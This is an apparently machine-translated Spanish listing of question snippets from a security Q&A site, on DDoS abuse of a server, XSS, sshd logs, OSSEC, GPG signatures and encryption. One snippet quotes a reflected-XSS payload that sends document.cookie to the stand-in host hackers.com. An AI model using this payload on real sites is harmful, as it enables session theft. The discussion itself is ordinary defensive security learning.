Todas las preguntas

4
respuestas

Descubra cómo se está utilizando mi servidor para los ataques DDOS

Recibí un correo electrónico de Amazon que indica que mi servidor Amazon EC2 se está utilizando para los ataques DDoS y que han cerrado todos los puertos excepto SSH. Esto es trágico para mí, pero no he podido averiguar cómo y dónde se está ejec...
pregunta 19.07.2013 - 09:05
1
respuesta

Ataque XSS reflejado mediante solicitud POST y carga útil XML

Sé que un XSS reflejado se puede hacer con una solicitud GET como: http://site.com?search=<script>location.href='http://hackers.com?sessionToken='+document.cookie;</script> Mientras la respuesta se vea similar a esto: <html...
pregunta 15.09.2013 - 20:30
1
respuesta

Muchos intentos fallidos de sshd salientes. ¿Soy hackeado?

Durante los últimos dos días he visto muchas líneas en mi /var/log/auth.log que parecen: sshd[xxxxx]: error: connect_to 0.gravatar.com port 80: failed sshd[xxxxx]: error: connect_to 1.gravatar.com port 80: failed sshd[xxxxx]: error: connect_to...
pregunta 07.04.2014 - 19:55
1
respuesta

Nuevo en ossec: ¿qué hace la respuesta activa fuera de la caja?

Soy nuevo en ossec. Instalé el servidor y el wui en una máquina dedicada. Tengo agentes que se ejecutan en mi zookeeper y en los servidores kafka para comenzar. Abajo hay eventos que estoy viendo. Asumo que son bots automatizados. 10 - User...
pregunta 19.02.2014 - 01:34
2
respuestas

¿Existe algún peligro al exponer los hashes de git sha1 commit?

Para un repositorio no público, ¿hay algún problema de seguridad al compartir hash hashes hash? Por ejemplo, cuando publico una pregunta relacionada con git stackoverflow que involucra git commit desde repositorios privados, cambiaré los hashes...
pregunta 27.08.2013 - 04:18
2
respuestas

GPG buena firma pero Advertencia: firma no confiable

Tengo un problema con algunos de mis clientes que no pueden abrir archivos adjuntos de correo electrónico cuando firmo los mensajes. El error que reciben es algo así como (traducción gratuita):    Error: no se puede abrir. La firma digital no...
pregunta 15.11.2013 - 14:48
1
respuesta

Reduciendo la longitud de la contraseña con la función hash

Supongamos que me gustaría usar una cadena muy larga como contraseña. Como ejemplo, podemos decir que esta cadena tiene una longitud de 100 caracteres. Sin embargo, supongamos que la aplicación para la que me gustaría usar esta contraseña sol...
pregunta 20.03.2013 - 22:36
2
respuestas

¿Hay casos de la vida real, donde el uso de la palabra clave final en Java aumenta la seguridad del sistema?

Encontré esa pregunta en StackOverflow: enlace Se hace la reclamación, que según Wikipedia:    Una clase final no puede ser subclasificada. Esto se hace por razones de   seguridad y eficiencia. y el OP preguntó, cómo se logra la segu...
pregunta 12.09.2013 - 17:31
4
respuestas

Contraseña de una sola vez a través de SMS - exponiendo el servidor de autenticación a internet

Considere un sitio web basado en Internet que hace autenticación. La aplicación web puede realizar la autenticación llamando a un servidor de autenticación que no está conectado a Internet. El servidor de autenticación no está en la DMZ. Sin emb...
pregunta 13.07.2013 - 10:54
2
respuestas

¿Cuán menos seguro es un cifrado si sabemos algo sobre los datos originales?

Tengo varios archivos cifrados con una clave derivada de una contraseña. En línea con la práctica estándar, uso un salt aleatorio y una contraseña y hago muchas iteraciones PBKDF2 para obtener una clave de cifrado y IV. Luego lo uso para cifrar...
pregunta 28.02.2013 - 12:27